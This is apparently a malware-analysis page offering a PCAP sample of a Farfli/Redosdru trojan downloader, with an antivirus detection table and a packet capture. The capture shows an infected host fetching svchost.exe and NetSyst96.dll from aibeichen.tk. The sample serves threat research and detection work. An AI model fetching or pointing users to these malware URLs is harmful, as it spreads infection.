Farfli/Beaugrit/Redosdru Malware Trojan Downloader Tropper PCAP file download traffic analysis sample svchost.exe GET /NetSyst96.dll aibeichen.tk

Download Attachments

  • pcap svchost
    Date added: May 15, 2017 2:49 am Added by: admin File size: 101 KB Downloads: 5

SHA256:     0752a3a777360dbbd4ebd344e1f7bf737419d682953762b45508c000db9b1634
File name:     svchost.exe
Detection ratio:     50 / 61
Analysis date:     2017-05-15 00:12:16 UTC ( 0 minutes ago )

Ad-Aware     Trojan.GenericKD.4978088     20170514
AegisLab     Backdoor.W32.Farfli!c     20170514
AhnLab-V3     Backdoor/Win32.Farfli.C1945393     20170514
ALYac     Trojan.GenericKD.4978088     20170514
Arcabit     Trojan.Generic.D4BF5A8     20170514
Avast     Win32:Trojan-gen     20170514
AVG     Downloader.Generic14.AKBZ     20170514
Avira (no cloud)     TR/AD.Itagomoko.cducf     20170514
AVware     LooksLike.Win32.Uruasy.b!ag (v)     20170515
Baidu     Win32.Trojan-Downloader.Agent.jm     20170503
BitDefender     Trojan.GenericKD.4978088     20170514
CAT-QuickHeal     Trojan.Redosdru.19849     20170513
Comodo     Backdoor.Win32.Beaugrit.C     20170515
CrowdStrike Falcon (ML)     malicious_confidence_100% (W)     20170130
Cyren     W32/Trojan.IM.gen!Eldorado     20170515
DrWeb     Trojan.DownLoader18.59296     20170515

 

 

2017-05-14 20:57:38.128163 IP 192.168.1.102.57868 > 139.199.219.111.80: Flags [P.], seq 0:397, ack 1, win 261, length 397: HTTP: GET /svchost.exe HTTP/1.1
E…|.@…S….f…o…P….X…P…….GET /svchost.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: aibeichen.tk
Connection: Keep-Alive

2017-05-14 20:57:45.525575 IP 192.168.1.102.57869 > 139.199.219.111.80: Flags [.], ack 143520933, win 261, length 0
E..(|.@…Um…f…o…P…F….P…S ……..
2017-05-14 20:57:45.536193 IP 192.168.1.102.57869 > 139.199.219.111.80: Flags [P.], seq 0:114, ack 1, win 261, length 114: HTTP: GET /NetSyst96.dll HTTP/1.1
E…|.@…T….f…o…P…F….P….W..GET /NetSyst96.dll HTTP/1.1
User-Agent: Mozilla/4.0 (compatible)
Host: aibeichen.tk
Cache-Control: no-cache

2017-05-14 20:57:45.942733 IP 192.168.1.102.57869 > 139.199.219.111.80: Flags [.], ack 1703, win 261, length 0
E..(|.@…Uk…f…o…P…….KP…L………
2017-05-14 20:57:45.948787 IP 192.168.1.102.57869 > 139.199.219.111.80: Flags [F.], seq 114, ack 1739, win 261, length 0
E..(| @…Uj…f…o…P…….oP…K………
2017-05-14 20:57:46.079148 IP 192.168.1.102.53853 > 75.75.76.76.53: 10968+ A? aibeichen.tk. (30)
E..:PH………fKKLL.].5.&..*………..        aibeichen.tk…..
2017-05-14 20:57:46.322193 IP 192.168.1.102.57869 > 139.199.219.111.80: Flags [R.], seq 115, ack 3163, win 0, length 0
E..(|!@…Ui…f…o…P……..P…GT……..
2017-05-14 20:57:46.966656 IP 192.168.1.102.57870 > 139.199.219.111.80: Flags [S], seq 879413223, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4|”@…U\…f…o…P4j…….. .G……………
2017-05-14 20:57:49.967974 IP 192.168.1.102.57870 > 139.199.219.111.80: Flags [S], seq 879413223, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4|#@…U[…f…o…P4j…….. .G……………
2017-05-14 20:57:55.967891 IP 192.168.1.102.57870 > 139.199.219.111.80: Flags [S], seq 879413223, win 8192, options [mss 1460,nop,nop,sackOK], length 0
E..0|$@…U^…f…o…P4j……p. .[)……….
2017-05-14 20:57:56.345498 IP 192.168.1.102.57870 > 139.199.219.111.80: Flags [.], ack 2845472442, win 65504, length 0
E..(|%@…Ue…f…o…P4j….v.P………….
2017-05-14 20:57:56.346395 IP 192.168.1.102.57870 > 139.199.219.111.80: Flags [P.], seq 0:149, ack 1, win 65504, length 149: HTTP: GET /NetSyst96.dll HTTP/1.1
E…|&@…T….f…o…P4j….v.P….u..GET /NetSyst96.dll HTTP/1.1
User-Agent: Mozilla/4.0 (compatible)
Host: aibeichen.tk
Cache-Control: no-cache
Cookie: HFS_SID=0.475456924876198

Leave a Reply